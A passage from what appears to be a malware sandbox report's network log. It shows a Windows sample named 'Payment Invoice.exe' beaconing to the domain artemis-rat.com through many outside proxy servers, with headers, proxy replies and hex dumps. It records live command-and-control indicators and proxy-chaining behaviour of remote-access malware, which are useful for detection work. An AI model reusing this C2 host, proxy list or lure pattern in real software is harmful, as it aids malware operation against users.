                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.519759893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.908266068 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:18 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                951192.168.2.452884185.162.229.215807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.522526979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.676660061 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:18 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                952192.168.2.4526655.32.88.13080807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.528667927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.010555029 CET72INHTTP/1.1 200 Connection established
                                                                Proxy-Agent: Fortinet-Proxy/1.0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                953192.168.2.450905194.213.208.22681807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.533792973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.620696068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.620970964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                954192.168.2.45281072.10.160.171315717076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.535027027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                955192.168.2.452903172.64.80.55807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.542974949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.698826075 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:18 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                956192.168.2.452753103.147.246.13580807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.543387890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.323688030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.511601925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.983660936 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                957192.168.2.452890159.65.77.16885857076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.543535948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                958192.168.2.45280670.166.167.55577457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.547786951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                959192.168.2.4527823.122.84.9931287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.571707964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.876833916 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:18 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                960192.168.2.450705201.243.82.15731287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.571794987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.620832920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.620970964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.466474056 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                961192.168.2.45108837.44.238.2534717076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.588704109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.589517117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.589834929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:30.589548111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:42.589432955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:54.591994047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:06.589308023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:30.589314938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:18.670805931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                962192.168.2.450992195.248.243.14972377076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.589344978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                963192.168.2.452898162.255.108.25456787076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.589934111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                964192.168.2.451119173.44.141.17920017076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.590358973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.756551027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.777132988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:30.792567968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:42.886174917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:54.886069059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:06.886104107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:30.886106014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                965192.168.2.45288867.43.236.1858797076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.594893932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.214719057 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                966192.168.2.45284872.210.252.13741457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.598169088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                967192.168.2.452722106.105.218.244807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.601177931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.480014086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                968192.168.2.45281958.75.126.23541457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.614645958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                969192.168.2.452820147.75.34.86807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.615981102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.918529034 CET65INHTTP/1.1 200 Connection Established
                                                                Proxy-Agent: Zscaler/6.3
                                                                Mar 11, 2024 16:15:18.918886900 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ef 20 05 bb a7 12 83 f7 c9 28 bf cc 37 2d ab a9 7b 6a 6e 9c 25 3d fe 6c b8 fb 78 87 de 42 10 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                Data Ascii: e (7-{jn%=lxB*,+0/$#('=<5/Uartemis-rat.com#


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                970192.168.2.45285898.178.72.21109197076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.616648912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                971192.168.2.452945104.16.107.142807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.619724989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.774277925 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:18 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                972192.168.2.45280931.134.151.40807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.627250910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                973192.168.2.452375119.196.168.183807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.628710985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                974192.168.2.452950104.19.233.117807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.632793903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.787952900 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:18 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                975192.168.2.452832147.75.34.85100077076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.635324001 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Mar 11, 2024 16:15:18.939938068 CET65INHTTP/1.1 200 Connection Established
                                                                Proxy-Agent: Zscaler/6.3


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                976192.168.2.45283045.138.87.23810807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.651525021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                977192.168.2.452859185.212.60.62807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.653625011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                978192.168.2.4528615.61.33.234807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.653628111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
